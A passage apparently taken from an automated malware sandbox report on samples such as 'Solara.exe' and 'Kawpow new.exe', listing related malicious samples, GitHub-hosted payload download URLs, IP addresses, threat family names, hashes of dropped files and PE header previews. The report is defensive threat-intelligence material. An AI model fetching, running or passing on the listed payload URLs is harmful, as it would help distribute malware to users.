                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                    HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                    steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                    OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                    steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                    SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                    SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                    140.82.121.3Winscreen.exeGet hashmaliciousXmrigBrowse
                                    • github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe
                                    stubInf.exeGet hashmaliciousXmrigBrowse
                                    • github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Winscreen.exe
                                    6glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                    • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                    firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                    • github.com/john-xor/temp/blob/main/index.html?raw=true
                                    0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                    • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                    MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                    • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                    RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                    • github.com/ssbb36/stv/raw/main/5.mp3
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    raw.githubusercontent.comSolara.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.108.133
                                    3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                                    • 185.199.111.133
                                    dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.110.133
                                    Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                    • 185.199.109.133
                                    ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.111.133
                                    over.ps1Get hashmaliciousVidarBrowse
                                    • 185.199.109.133
                                    Epsilon.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.111.133
                                    eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                    • 185.199.110.133
                                    Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                    • 185.199.108.133
                                    github.comSolara.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.3
                                    PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                    • 140.82.121.4
                                    ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                    • 140.82.121.3
                                    Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                    • 140.82.121.4
                                    ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.3
                                    eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                    • 140.82.121.4
                                    fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                    • 20.233.83.145
                                    Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                    • 185.199.111.133
                                    OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                    • 20.233.83.145
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    FASTLYUSSolara.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.108.133
                                    Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                    • 151.101.2.137
                                    https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                    • 151.101.128.176
                                    https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkMGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.2.137
                                    Onedrive Shared document.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.2.137
                                    Quarantined Messages(3).zipGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.194.137
                                    Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                    • 151.101.129.140
                                    https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                    • 151.101.194.137
                                    file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                    • 151.101.193.229
                                    GITHUBUSSolara.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.4
                                    https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.3
                                    PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                    • 140.82.121.4
                                    ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                    • 140.82.121.3
                                    Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                    • 140.82.121.4
                                    ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                    • 140.82.121.3
                                    EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                    • 140.82.121.3
                                    5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                    • 140.82.121.3
                                    eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                    • 140.82.121.4
                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                    • 192.30.252.154
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eSolara.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    vRecording__0023secs__Stgusa.htmlGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    c2.htaGet hashmaliciousRemcosBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    setup-avast-premium-x64.exeGet hashmaliciousUnknownBrowse
                                    • 185.199.109.133
                                    • 140.82.121.3
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeKawpow new.exeGet hashmaliciousUnknownBrowse
                                      kx new.exeGet hashmaliciousUnknownBrowse
                                        Solara.exeGet hashmaliciousUnknownBrowse
                                          C:\Users\user\AppData\Local\Temp\Kawpow new.exeKawpow new.exeGet hashmaliciousUnknownBrowse
                                            kx new.exeGet hashmaliciousUnknownBrowse
                                              Solara.exeGet hashmaliciousUnknownBrowse
                                                Process:C:\Users\user\AppData\Local\Temp\Kawpow new.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5471744
                                                Entropy (8bit):6.525931537093555
                                                Encrypted:false
                                                SSDEEP:98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
                                                MD5:FB6A3B436E9F9402937D95F755B62F91
                                                SHA1:AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
                                                SHA-256:4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
                                                SHA-512:7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Joe Sandbox View:
                                                • Filename: Kawpow new.exe, Detection: malicious, Browse
                                                • Filename: kx new.exe, Detection: malicious, Browse
                                                • Filename: Solara.exe, Detection: malicious, Browse
                                                Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):954
                                                Entropy (8bit):5.350970057955659
                                                Encrypted:false
                                                SSDEEP:24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
                                                MD5:3CE64235B0821B76294C3AD95F117E6C
                                                SHA1:FD1EC471493CE132D0D719A9771739912BEF91BF
                                                SHA-256:C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
                                                SHA-512:DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllulfp6h:NllU
                                                MD5:159D16812BFACDBF13AC45B88C35CCD4
                                                SHA1:A3006CFEF77F199472CE30AD2DA618CAB631B2F3
                                                SHA-256:544BA61DA2E4DD6FD594E984E5004AC8857208F995FCE2E6A66DDD0E8B7B1B68
                                                SHA-512:967BC6F441F32AA748DE6455E82634AB7B04407D456B936C8342C353DE6336884C38339614C96205172F9CCA59C6E96FAF2AC73ED64A16ED8E159FFAAEE241C5
                                                Malicious:false
                                                Preview:@...e.................................N.?............@..........
                                                Process:C:\Users\user\AppData\Local\Temp\kx new.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5471744
                                                Entropy (8bit):6.525931537093555
                                                Encrypted:false
                                                SSDEEP:98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
                                                MD5:FB6A3B436E9F9402937D95F755B62F91
                                                SHA1:AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
                                                SHA-256:4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
                                                SHA-512:7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Joe Sandbox View:
                                                • Filename: Kawpow new.exe, Detection: malicious, Browse
                                                • Filename: kx new.exe, Detection: malicious, Browse
                                                • Filename: Solara.exe, Detection: malicious, Browse
                                                Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Solara Bootstrapper.exe
                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):13312
                                                Entropy (8bit):4.677524556734161
                                                Encrypted:false
                                                SSDEEP:192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
                                                MD5:6557BD5240397F026E675AFB78544A26
                                                SHA1:839E683BF68703D373B6EAC246F19386BB181713
                                                SHA-256:A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
                                                SHA-512:F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 33%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..*...........I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..*6..(.........*....0...........(....o......rS..p(.........+8...........o..........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
